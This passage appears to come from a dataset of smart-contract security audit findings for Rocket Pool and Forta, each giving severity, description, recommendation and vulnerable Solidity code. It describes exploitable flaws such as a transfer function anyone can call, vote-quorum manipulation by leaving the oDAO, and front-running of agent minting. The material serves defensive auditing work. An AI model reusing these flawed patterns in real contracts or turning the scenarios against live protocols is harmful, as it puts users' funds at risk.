contract types by default. An explicit downcast is not required.\\n```\\n » Test example = Test(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)\\n » abi.encodePacked(\"hi\", example)\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n » abi.encodePacked(\"hi\", address(example))\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n```\\n\\nMore examples of `address _minipool` declarations:\\n```\\n/// @dev Internal logic to set a minipool's pubkey\\n/// @param \\_pubkey The pubkey to set for the calling minipool\\nfunction \\_setMinipoolPubkey(address \\_minipool, bytes calldata \\_pubkey) private {\\n // Load contracts\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(\"addressSetStorage\"));\\n // Initialize minipool & get properties\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipool);\\n```\\n\\n```\\nfunction getMinipoolDetails(address \\_minipoolAddress) override external view returns (MinipoolDetails memory) {\\n // Get contracts\\n RocketMinipoolInterface minipoolInterface = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketMinipoolBase minipool = RocketMinipoolBase(payable(\\_minipoolAddress));\\n RocketNetworkPenaltiesInterface rocketNetworkPenalties = RocketNetworkPenaltiesInterface(getContractAddress(\"rocketNetworkPenalties\"));\\n```\\n\\nMore examples of `RocketStorageInterface _rocketStorage` casts:\\n```\\ncontract RocketNodeDistributor is RocketNodeDistributorStorageLayout {\\n bytes32 immutable distributorStorageKey;\\n\\n constructor(address \\_nodeAddress, address \\_rocketStorage) {\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n nodeAddress = \\_nodeAddress;\\n```\\nчWe recommend using more specific types instead of `address` where possible. Downcast if necessary. 
This goes for parameter types as well as state variable types.чч```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), \"Invalid node address\");\\n require(storageState == StorageState.Undefined, \"Already initialised\");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n -Redundant double casts Acknowledgedчlowч`_rocketStorageAddress` is already of contract type `RocketStorageInterface`.\\n```\\n/// @dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n\\n`_tokenAddress` is already of contract type `ERC20Burnable`.\\n```\\nfunction burnToken(ERC20Burnable \\_tokenAddress, uint256 \\_amount) override external onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender), \\_tokenAddress));\\n // Update balances\\n tokenBalances[contractKey] = tokenBalances[contractKey].sub(\\_amount);\\n // Get the token ERC20 instance\\n ERC20Burnable tokenContract = ERC20Burnable(\\_tokenAddress);\\n```\\n\\n`_rocketTokenRPLFixedSupplyAddress` is already of contract type `IERC20`.\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, IERC20 \\_rocketTokenRPLFixedSupplyAddress) RocketBase(\\_rocketStorageAddress) ERC20(\"Rocket Pool Protocol\", \"RPL\") {\\n // Version\\n version = 1;\\n // Set the mainnet RPL fixed supply token address\\n rplFixedSupplyContract = IERC20(\\_rocketTokenRPLFixedSupplyAddress);\\n```\\nчWe recommend removing the unnecessary double casts and copies of local variables.чч```\\n/// @dev 
Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n -RocketMinipoolDelegate - Missing event in prepareVacancyчlowчThe function `prepareVacancy` updates multiple contract state variables and should therefore emit an event.\\n```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(\"rocketMinipoolManager\", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, \"Must be in initialised status\");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, \"Refund balance not zero\");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(\"rocketDAOProtocolSettingsMinipool\"));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, \"Balance is too low\");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\nчEmit the missing event.чч```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// 
@param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(\"rocketMinipoolManager\", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, \"Must be in initialised status\");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, \"Refund balance not zero\");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(\"rocketDAOProtocolSettingsMinipool\"));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, \"Balance is too low\");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\n -RocketMinipool - Inconsistent access control modifier declaration onlyMinipoolOwner AcknowledgedчlowчThe access control modifier `onlyMinipoolOwner` should be renamed to `onlyMinipoolOwnerOrWithdrawalAddress` to be consistent with the actual check permitting the owner or the withdrawal address to interact with the function. 
This would also be consistent with other declarations in the codebase.\\nExample\\nThe `onlyMinipoolOwner` modifier in `RocketMinipoolBase` is the same as `onlyMinipoolOwnerOrWithdrawalAddress` in other modules.\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, \"Only the node operator can access this method\");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, \"Only the node operator can access this method\");\\n \\_;\\n}\\n```\\n\\nOther declarations:\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, \"Invalid minipool owner\");\\n \\_;\\n}\\n\\n/// @dev Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), \"Invalid minipool owner\");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, \"Invalid minipool owner\");\\n \\_;\\n}\\n\\n// Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), \"Invalid minipool owner\");\\n 
\\_;\\n}\\n```\\nчResolution\\nAcknowledged by the client. Not addressed within rocket-pool/rocketpool@77d7cca\\nAgreed. This would change a lot of contracts just for a minor improvement in readability.\\nWe recommend renaming `RocketMinipoolBase.onlyMinipoolOwner` to `RocketMinipoolBase.onlyMinipoolOwnerOrWithdrawalAddress`.чч```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, \"Only the node operator can access this method\");\\n \\_;\\n}\\n```\\n -RocketDAO*Settings - settingNameSpace should be immutable AcknowledgedчlowчThe `settingNameSpace` in the abstract contract `RocketDAONodeTrustedSettings` is only set on contract deployment. Hence, the fields should be declared immutable to make clear that the settings namespace cannot change after construction.\\n`RocketDAONodeTrustedSettings`\\n```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n\\n```\\n// Construct\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, string memory \\_settingNameSpace) RocketBase(\\_rocketStorageAddress) {\\n // Apply the setting namespace\\n settingNameSpace = keccak256(abi.encodePacked(\"dao.trustednodes.setting.\", \\_settingNameSpace));\\n}\\n```\\n\\n`RocketDAOProtocolSettings`\\n```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n\\n```\\n// Construct\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, string memory \\_settingNameSpace) RocketBase(\\_rocketStorageAddress) {\\n // Apply the setting namespace\\n settingNameSpace = keccak256(abi.encodePacked(\"dao.protocol.setting.\", \\_settingNameSpace));\\n}\\n```\\n\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) RocketDAOProtocolSettings(\\_rocketStorageAddress, 
\"auction\") {\\n // Set version\\n version = 1;\\n```\\nчWe recommend using the `immutable` annotation in Solidity (see Immutable).чч```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n -Kicked oDAO members' votes taken into account AcknowledgedчmediumчoDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. 
If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(\"rocketNetworkPrices\", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. 
Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMinipool\"));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(\"minipool.bond.reduction.vote.count\", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(\"rocketNetworkPenalties\", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(\"rocketDAOProtocolSettingsNetwork\"));\\n // Get submission keys\\n```\\nчTrack oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.чч```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n -didTransferShares function 
has no access control modifierчhighчThe staked tokens (shares) in Forta are meant to be transferable. Similarly, the rewards allocation for these shares for delegated staking is meant to be transferable as well. This allocation for the shares' owner is tracked in the `StakeAllocator`. To enable this, the Forta staking contract `FortaStaking` implements a `_beforeTokenTransfer()` function that calls `_allocator.didTransferShares()` when it is appropriate to transfer the underlying allocation.\\n```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n\\nDue to this, the `StakeAllocator.didTransferShares()` has an `external` visibility so it can be called from the `FortaStaking` contract to perform transfers. However, there is no access control modifier to allow only the staking contract to call this. Therefore, anyone can call this function with whatever parameters they want.\\n```\\nfunction didTransferShares(\\n uint256 sharesId,\\n uint8 subjectType,\\n address from,\\n address to,\\n uint256 sharesAmount\\n) external {\\n \\_rewardsDistributor.didTransferShares(sharesId, subjectType, from, to, sharesAmount);\\n}\\n```\\n\\nSince the allocation isn't represented as a token standard and is tracked directly in the `StakeAllocator` and `RewardsDistributor`, it lacks many standard checks that would prevent abuse of the function. 
For example, this function does not have a check for allowance or `msg.sender==from`, so any user could call `didTransferShares()` with `to` being their address and `from` being any address they want `to` transfer allocation `from`, and the call would succeed.чApply access control modifiers as appropriate for this contract, for example `onlyRole()`.чч```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n -Incorrect reward epoch start date calculationчhighчThe Forta rewards system is based on epochs. A privileged address with the role `REWARDER_ROLE` calls the `reward()` function with a parameter for a specific `epochNumber` that consequently distributes the rewards for that epoch. Additionally, as users stake and delegate their stake, accounts in the Forta system accrue weight that is based on the active stake to distribute these rewards. Since accounts can modify their stake as well as delegate or un-delegate it, the rewards weight for each account can be modified, as seen, for example, in the `didAllocate()` function. In turn, this modifies the `DelegatedAccRewards` storage struct that stores the accumulated rewards for each share id. 
To keep track of changes done to the accumulated rewards, epochs with checkpoints are used to manage the accumulated rate of rewards, their value at the checkpoint, and the timestamp of the checkpoint.\\nFor example, in the `didAllocate()` function the `addRate()` function is being called to modify the accumulated rewards.\\n```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n\\nThen the function flow goes into `setRate()` that checks the existing accumulated rewards storage and modifies it based on the current timestamp.\\n```\\nfunction addRate(Accumulator storage acc, uint256 rate) internal {\\n setRate(acc, latest(acc).rate + rate);\\n}\\n```\\n\\n```\\nfunction setRate(Accumulator storage acc, uint256 rate) internal {\\n EpochCheckpoint memory ckpt = EpochCheckpoint({ timestamp: SafeCast.toUint32(block.timestamp), rate: SafeCast.toUint224(rate), value: getValue(acc) });\\n uint256 length = acc.checkpoints.length;\\n if (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n } else {\\n acc.checkpoints.push(ckpt);\\n }\\n}\\n```\\n\\nNamely, it pushes epoch checkpoints to the list of account checkpoints based on its timestamp. If the last checkpoint's timestamp is during the current epoch, then the last checkpoint is replaced with the new one altogether. If the last checkpoint's timestamp is different from the current epoch, a new checkpoint is added to the list. 
However, the `isCurrentEpoch()` function calls a function `getCurrentEpochTimestamp()` that incorrectly determines the start date of the current epoch. In particular, it doesn't take the offset into account when calculating how many epochs have already passed.\\n```\\nfunction getCurrentEpochTimestamp() internal view returns (uint256) {\\n return ((block.timestamp / EPOCH\\_LENGTH) \\* EPOCH\\_LENGTH) + TIMESTAMP\\_OFFSET;\\n}\\n\\nfunction isCurrentEpoch(uint256 timestamp) internal view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp > currentEpochStart;\\n}\\n```\\n\\nInstead of `((block.timestamp / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`, it should be `(((block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`. In fact, it should simply call the `getEpochNumber()` function that correctly provides the epoch number for any timestamp.\\n```\\nfunction getEpochNumber(uint256 timestamp) internal pure returns (uint32) {\\n return SafeCast.toUint32((timestamp - TIMESTAMP\\_OFFSET) / EPOCH\\_LENGTH);\\n}\\n```\\n\\nIn other words, the resulting function would look something like the following:\\n```\\n function getCurrentEpochTimestamp() public view returns (uint256) {\\n return (getEpochNumber(block.timestamp) * EPOCH_LENGTH) + TIMESTAMP_OFFSET;\\n }\\n```\\n\\nOtherwise, if `block.timestamp` is such that `(block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH = n` and `block.timestamp` / EPOCH_LENGTH = n+1, which would happen on roughly 4 out of 7 days of the week since `EPOCH_LENGTH = 1 weeks` and `TIMESTAMP_OFFSET = 4 days`, this would cause the `getCurrentEpochTimestamp()` function to return the end timestamp of the epoch (which is in the future) instead of the start. 
Therefore, if a checkpoint with such a timestamp is committed to the account's accumulated rewards checkpoints list, it will always fail the below check in the epoch it got submitted, and any checkpoint committed afterwards but during the same epoch with a similar type of `block.timestamp` (i.e. satisfying the condition at the beginning of this paragraph), would be pushed to the top of the list instead of replacing the previous checkpoint.\\n```\\nif (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n} else {\\n acc.checkpoints.push(ckpt);\\n```\\n\\nThis causes several checkpoints to be stored for the same epoch, which would cause issues in functions such as `getAtEpoch()`, that feeds into `getValueAtEpoch()` function that provides data for the rewards' share calculation. In the end, this would cause issues in the accounting for the rewards calculation resulting in incorrect distributions.\\nDuring the discussion with the Forta Foundation team, it was additionally discovered that there are edge cases around the limits of epochs. Specifically, epoch's end time and the subsequent epoch's start time are exactly the same, although it should be that it is only the start of the next epoch. Similarly, that start time isn't recognized as part of the epoch due to `>` sign instead of `>=`. 
In particular, the following changes need to be made:\\n```\\n function getEpochEndTimestamp(uint256 epochNumber) public pure returns (uint256) {\\n return ((epochNumber + 1) * EPOCH_LENGTH) + TIMESTAMP_OFFSET - 1; <---- so it is 23:59:59 instead of next day 00:00:00\\n }\\n\\n function isCurrentEpoch(uint256 timestamp) public view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp >= currentEpochStart; <--- for the first second on Monday\\n }\\n```\\nчA refactor of the epoch timestamp calculation functions is recommended to account for:\\nThe correct epoch number to calculate the start and end timestamps of epochs.\\nThe boundaries of epochs coinciding.\\nClarity in functions' intent. For example, adding a function just to calculate any epoch's start time and renaming `getCurrentEpochTimestamp()` to `getCurrentEpochStartTimestamp()`.чч```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n -A single unfreeze dismisses all other slashing proposal freezesчhighчIn order to retaliate against malicious actors, the Forta staking system allows users to submit slashing proposals that are guarded by submitting along a deposit with a slashing reason. These proposals immediately freeze the proposal's subject's stake, blocking them from withdrawing that stake.\\nAt the same time, there can be multiple proposals submitted against the same subject, which works out with freezing - the subject remains frozen with each proposal submitted. 
However, once any one of the active proposals against the subject gets to the end of its lifecycle, be it `REJECTED`, `DISMISSED`, `EXECUTED`, or `REVERTED`, the subject gets unfrozen altogether. The other proposals might still be active, but the stake is no longer frozen, allowing the subject to withdraw it if they would like.\\nIn terms of impact, this allows bad actors to avoid punishment intended by the slashes and freezes. A malicious actor could, for example, submit a faulty proposal against themselves in the hopes that it will get quickly rejected or dismissed while the existing, legitimate proposals against them are still being considered. This would allow them to get unfrozen quickly and withdraw their stake. Similarly, in the event a bad staker has several proposals against them, they could withdraw right after a single slashing proposal goes through.\\n```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction rejectSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, REJECTED);\\n \\_submitEvidence(\\_proposalId, REJECTED, \\_evidence);\\n \\_slashDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction reviewSlashProposalParameters(\\n uint256 \\_proposalId,\\n uint8 \\_subjectType,\\n uint256 \\_subjectId,\\n bytes32 \\_penaltyId,\\n string[] calldata \\_evidence\\n) external onlyRole(SLASHING\\_ARBITER\\_ROLE) onlyInState(\\_proposalId, IN\\_REVIEW) onlyValidSlashPenaltyId(\\_penaltyId) onlyValidSubjectType(\\_subjectType) notAgencyType(\\_subjectType, SubjectStakeAgency.DELEGATOR) {\\n // No need to check for proposal existence, onlyInState will revert if 
\\_proposalId is in undefined state\\n if (!subjectGateway.isRegistered(\\_subjectType, \\_subjectId)) revert NonRegisteredSubject(\\_subjectType, \\_subjectId);\\n\\n \\_submitEvidence(\\_proposalId, IN\\_REVIEW, \\_evidence);\\n if (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n }\\n```\\n\\n```\\nfunction revertSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external {\\n \\_authorizeRevertSlashProposal(\\_proposalId);\\n \\_transition(\\_proposalId, REVERTED);\\n \\_submitEvidence(\\_proposalId, REVERTED, \\_evidence);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction executeSlashProposal(uint256 \\_proposalId) external onlyRole(SLASHER\\_ROLE) {\\n \\_transition(\\_proposalId, EXECUTED);\\n Proposal memory proposal = proposals[\\_proposalId];\\n slashingExecutor.slash(proposal.subjectType, proposal.subjectId, getSlashedStakeValue(\\_proposalId), proposal.proposer, slashPercentToProposer);\\n slashingExecutor.freeze(proposal.subjectType, proposal.subjectId, false);\\n}\\n```\\n\\n```\\nfunction \\_unfreeze(uint256 \\_proposalId) private {\\n slashingExecutor.freeze(proposals[\\_proposalId].subjectType, proposals[\\_proposalId].subjectId, false);\\n}\\n```\\nчIntroduce a check in the unfreezing mechanics to first ensure there are no other active proposals for that subject.чч```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n -Storage gap variables slightly off from the intended sizeчmediumчThe Forta staking system is using upgradeable proxies for its deployment strategy. 
To avoid storage collisions between contract versions during upgrades, uint256[] private `__gap` array variables are introduced that create a storage buffer. Together with contract state variables, the storage slots should sum up to 50. For example, the `__gap` variable is present in the `BaseComponentUpgradeable` component, which is the base of most Forta contracts, and there is a helpful comment in `AgentRegistryCore` that describes how its relevant `__gap` variable size was calculated:\\n```\\nuint256[50] private \\_\\_gap;\\n```\\n\\n```\\nuint256[41] private \\_\\_gap; // 50 - 1 (frontRunningDelay) - 3 (\\_stakeThreshold) - 5 StakeSubjectUpgradeable\\n```\\n\\nHowever, there are a few places where the `__gap` size was not computed correctly to get the storage slots up to 50. Some of these are:\\n```\\nuint256[49] private \\_\\_gap;\\n```\\n\\n```\\nuint256[47] private \\_\\_gap;\\n```\\n\\n```\\nuint256[44] private \\_\\_gap;\\n```\\n\\nWhile these still provide large storage buffers, it is best if the `__gap` variables are calculated to hold the same buffer within contracts of similar types as per the initial intentions to avoid confusion.\\nDuring conversations with the Forta Foundation team, it appears that some contracts like `ScannerRegistry` and `AgentRegistry` should instead add up to 45 with their `__gap` variable due to the `StakeSubject` contracts they inherit from adding 5 from themselves. This is something to note and be careful with as well for future upgrades.чProvide appropriate sizes for the `__gap` variables to have a consistent storage layout approach that would help avoid storage issues with future versions of the system.чч```\\nuint256[50] private \\_\\_gap;\\n```\\n -AgentRegistryCore - Agent Creation DoSчmediumчAgentRegistryCore allows anyone to mint an `agentID` for the desired owner address. 
However, in some cases, it may fall prey to DoS, either deliberately or unintentionally.\\nFor instance, let's assume the Front Running Protection is disabled or the `frontRunningDelay` is 0. It means anyone can directly create an agent without any prior commitment. Thus, anyone can observe pending transactions and try to front run them to mint an `agentID` prior to the victim's restricting it to mint a desired `agentID`.\\nAlso, it may be possible that a malicious actor succeeds in frontrunning a transaction with manipulated data/chainIDs but with the same owner address and `agentID`. There is a good chance that victim still accepts the attacker's transaction as valid, even though its own transaction reverted, due to the fact that the victim is still seeing itself as the owner of that ID.\\nTaking an instance where let's assume the frontrunning protection is enabled. Still, there is a good chance that two users vouch for the same `agentIDs` and commits in the same block, thus getting the same frontrunning delay. 
